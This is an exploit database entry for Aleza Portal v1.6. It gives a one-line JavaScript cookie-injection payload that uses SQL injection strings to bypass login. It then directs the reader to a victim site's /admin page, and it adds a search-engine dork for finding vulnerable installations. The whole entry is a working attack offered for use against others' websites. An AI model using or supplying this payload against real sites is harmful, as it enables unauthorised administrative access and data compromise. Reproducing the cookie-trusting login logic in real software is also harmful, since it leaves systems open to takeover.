Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling

2010-09-29T00:00:00
ID 1337DAY-ID-14256
Type zdt
Reporter KnocKout
Modified 2010-09-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling
===================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Aleza Portal v1.6
~Software: http://www.webavail.com/
-Demo : http://www.webavail.com/alezademo/
~Vulnerability Style : (SQLi) Cookie Handling
~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation ~~~~~~~~~~~
 
    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
    ================================
          [+]  Exploitable Browser Injected!
 
          [+]   Go to : http://[Victim]/admin
           
       
      GoodLucK ;)



#  0day.today [2018-02-20]  #